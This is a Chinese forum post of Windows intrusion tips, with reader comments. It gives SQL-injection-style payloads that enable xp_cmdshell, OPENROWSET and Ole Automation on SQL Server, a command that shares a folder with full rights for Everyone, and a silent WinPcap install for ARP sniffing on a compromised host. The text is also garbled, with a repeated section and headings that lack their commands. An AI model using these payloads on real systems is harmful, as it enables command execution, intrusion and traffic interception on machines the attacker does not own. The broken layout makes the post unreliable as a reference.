Win下渗透小技巧整理
1、win2012下面访问文件共享的方法,由于2012只能通过administrator用户才能访问\\10.100.2.19\c$,其它管理组用户只能通过下列方式来访问:2、命令行下安装winpcap的方法:用官方的winpcap是不行的。但是今天我发现用nmap里自带的winpcap-nmap-4.02.exe居然可以。哈哈。参数是winpcap-nmap-4.02.exe /S,然后再用你给我的那个命令行下的arp嗅探工具就行了。这样就不必需要每次都3389安装winpcap了。
3、SQL2005-2012开启选项的一些方法整理:
sql server 2005下开启xp_cmdshell的办法关闭一样.只是将上面的后面的那个"1"改成"0"就可以了:sql2005下,xp_cmdshell、sp_oA的开启方法我查到资料了,我都已经开启了,浏览器返回正常,执行命令不会再出现权限错误,但是执行“sp_oA”时会出现超时提示,执行“xp_cmdshell“时,本地监听无反应,这些我在提问贴里已经说明了,不知道是不是防火墙阻止了ping、tftp 和telnet的对外连接,我实在是找不到好的得到这个SQL2005的IP的办法了.
SQL2005开启'OPENROWSET'支持的方法:SQL2005开启'sp_oacreate'支持的方法:
mkdir c:\temp
net share temp=c:\temp /GRANT:everyone,FULL //将c:\temp共享为temp
访问:\\10.100.2.19\temp //test11/12345678
net share temp /del /y
3、SQL2005-2012开启选项的一些方法整理:
sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
SQL2005开启'OPENROWSET'支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
exec sp_configure [show advanced options],1;RECONFIGURE;exec sp_configure [Ad Hoc Distributed Queries],1;RECONFIGURE;--
;exec sp_configure "show advanced options", 1;RECONFIGURE;exec sp_configure "Ad Hoc Distributed Queries",1;RECONFIGURE;--
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
评论6次
谢谢整理哈,不过坛龄800多天 够牛的
感觉这没什么渗透技巧啊 看到坛龄800多天 表示怀疑啊
看了第一条记录,感觉有点懵逼,但是好像就是一个文件共享。看了第2条,第3条发现的确是小技巧,收藏一波!
"参数是winpcap-nmap-4.02.exe /S,然后再用你给我的那个命令行下的arp嗅探工具就行了。这样就不必需要每次都3389安装winpcap了。" 这样Windows安装pcap 的姿势,受教了。
好高端,受教了
才看了第一条,前文和后文说的好像不是同一个东西。。